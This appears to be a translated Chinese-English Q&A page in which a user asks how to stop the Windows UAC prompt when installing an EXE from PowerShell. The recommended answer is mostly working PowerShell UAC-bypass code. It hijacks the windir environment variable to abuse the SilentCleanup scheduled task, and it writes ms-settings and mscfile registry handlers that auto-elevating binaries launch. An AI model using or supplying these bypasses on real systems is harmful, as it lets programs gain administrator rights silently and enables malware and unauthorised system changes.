UAC 妨碍 EXE 安装 Powershell [英] UAC Getting in the Way of EXE Install Powershell
问题描述
我正在尝试使用带有以下代码的 Powershell 安装 EXE Start-Process -FilePath "C:\Windows\Temp\Installer.exe" -Verb runas
我正在获取用户帐户控制弹出窗口显示您要允许以下程序对此计算机进行更改吗?"我宁愿不禁用 UAC.是否有任何方法可以以编程方式对 UAC 提示说是"或绕过它?
I'm attempting to install an EXE using Powershell with the following code Start-Process -FilePath "C:\Windows\Temp\Installer.exe" -Verb runas
I'm getting the User Account Control pop up that says "Do you want to allow the following program to make changes to this computer?" I would rather not disable UAC. Are there any methods to programatically say "Yes" to the UAC prompt or to get around it?
推荐答案
禁用 UAC 编辑 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
中的一个键,因此需要对HKLM
.换句话说,禁用 UAC 需要管理员权限,这与您的问题无关.
Disabling UAC edits a key in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
, and thus requires write access to HKLM
. In other words, disabling UAC requires admin rights, which defeats the point of your question.
Windows 有一个内置 AutoElevate 后门.您可以使用它来启动其他可执行文件.
Windows has a built-in AutoElevate backdoor. You can use this to launch other executables.
- 一个明显的方法是任务计划程序.然而,这不是唯一的方法.
- 同样,任何可以 auto-elevate 可用于在没有 UAC 的情况下生成高完整性进程.
- 这可以在下面以编程方式完成:
- An obvious approach is Task Scheduler. However, it's not the only approach.
- Likewise, any windows executable that can auto-elevate can be used to spawn a high integrity process without UAC.
- This can be done programmatically below:
始终通知:(8.1 及之后)
AlwaysNotify: (8.1 & after)
$regPath = "HKCU:\Environment"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself
Set-ItemProperty -Path $regPath -Name "windir" -Value "$installer && REM " -Force
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-ItemProperty -Path $regPath -Name "windir" -Force
默认:
function Bypass-UAC{
[CmdletBinding()]
param([string]$key, [string]$exploit)
$regPath = "HKCU:\Software\Classes\$key\shell\open\command"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself
New-Item $regPath -Force
New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
Start-Process $exploit
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-Item $regPath -Force -Recurse
}
$ver = [System.Environment]::OSVersion.Version.Major #Get Windows Version
if ($ver -eq 10) {
Bypass-UAC ms-settings ComputerDefaults.exe
} else {
Bypass-UAC mscfile CompMgmtLauncher.exe
}
从不通知/禁用:
Start-Process "C:\Windows\Temp\Installer.exe" -Verb runas
这篇关于UAC 妨碍 EXE 安装 Powershell的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!